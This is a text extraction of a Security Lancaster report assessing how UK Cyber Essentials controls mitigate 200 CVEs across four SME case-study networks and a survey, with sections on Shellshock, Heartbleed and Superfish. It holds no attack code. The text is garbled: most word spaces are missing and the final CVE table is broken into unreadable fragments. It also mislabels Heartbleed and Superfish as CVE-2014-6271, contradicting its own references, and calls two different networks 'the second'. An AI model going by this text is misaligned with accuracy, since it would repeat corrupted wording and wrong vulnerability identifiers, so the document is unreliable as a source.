Data Collection
In order to analyse the effectiveness of theCyber Essentials Security Tools four real-world SME networks have been modelledModels have been composed using informationgathered in interviews and abstracted toreduce redundant complexity and removeany linkage with the SME In addition ageneralisable SME model was composed fromSurvey responses to serve as a baselinenetwork from which all SME networks maybe adapted
Interviews
The interviews were composed with the goalof firstly understanding the layout or topologyof the network deployed by an SME To thenbuild on the network configuration it wasimportant to understand how the network isused - where remote connections take placehow local services are utilised and how anattacker sees the network Hardware vendorsoperating systems and version numbers wereconsidered to build a greater understanding ofthe network
Additional questions were posed toexamine the current state of security on thenetwork such as any security accreditationsprevious breaches and how often updates arerolled out
Survey
The Survey was constructed as a stripped-down questionnaire representing the essenceof the questions posed in the Interviews Thisincluded details of the number of workstationsat the SME to gauge its size the localand remote services available the operatingsystems used on the service providers andworkstations the current security policies in
place and the respondentsrsquo awareness of theCE Scheme
Two surveys were sent out one to a securelist of SMEs in the NW Security Cluster[9]and another publicly to closed groups ofsecurity-interested SME representatives
Vulnerabilities
A total of 200 random vulnerabilitieshave been equally taken from two annualvulnerability lists of CVE-2013 and CVE-2014 published by Mitre2 Any vulnerabilitiesfound to be unsuitable for analysis have beenreplaced by a new candidate
In this report we use the Mitreorganisation definition for a vulnerabilitywhich they state as
An information securityldquovulnerabilityrdquo is a mistake in softwarethat can be directly used by ahacker to gain access to a system ornetwork CVE considers a mistake avulnerability if it allows an attackerto use it to violate a reasonablesecurity policy for that system (thisexcludes entirely ldquoopenrdquo security
2CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security
Figure 3 Methodology for Assessing Cyber Essentials
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 4 of 28
policies in which all users are trustedor where there is no consideration ofrisk to the system)
(As shown on Mitreorgrsquos Terminologypage[6] in March rsquo15)
To warrant a CVE entry into the Mitrelist individual vulnerabilities must place theaffected system (or systems) in to a statewhich either
bull allows an attacker to executecommands as another user
bull allows an attacker to access data that iscontrary to the specified access restrictionsfor that data
bull allows an attacker to pose as anotherentity
bull allows an attacker to conduct a denialof service
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities werealso taken in addition to the randomly chosen200 and have been assessed to what extentthe Cyber Essentials scheme would affect thevulnerability of SMEs in these situations
Additionally the applicability of thesevulnerabilities to the SME networks we studiedis included along with the respective potentialto harm operations
Mitigation Assessment
The Vulnerabilities chosen have beenqualitatively assessed for mitigation withand without the use of the Cyber Essentialscontrols The process considers each
component of the controls in asserting whethereach vulnerability would be mitigated partiallymitigated or not mitigated The results aredouble-vetted to ensure correctness
For each of the SMEs Interviewed each ofthe vulnerabilities are assessed for applicabilityto that network configuration In cases wherethe vulnerability is for a specific model ofhardware the network is deemed applicable ifit uses a like-product from the same vendorIn cases where the vulnerability is in softwareonly those referencing software in-use or likelyin-use (based on the SMErsquos practice) aredeemed applicable to the network
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 5 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
